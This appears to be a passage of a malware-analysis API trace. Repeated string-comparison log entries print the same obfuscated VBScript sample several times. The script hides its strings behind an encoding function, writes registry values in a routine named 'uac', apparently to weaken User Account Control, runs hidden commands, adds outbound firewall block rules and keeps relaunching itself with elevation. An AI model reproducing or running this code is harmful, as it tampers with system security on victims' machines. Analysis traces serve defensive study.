bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.371] wcsncmp (_String1="bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 85 [0226.371] wcsncmp (_String1="mw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0226.371] wcsncmp (_String1="w(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 106 [0226.371] wcsncmp (_String1="(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.371] wcsncmp (_String1="\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = 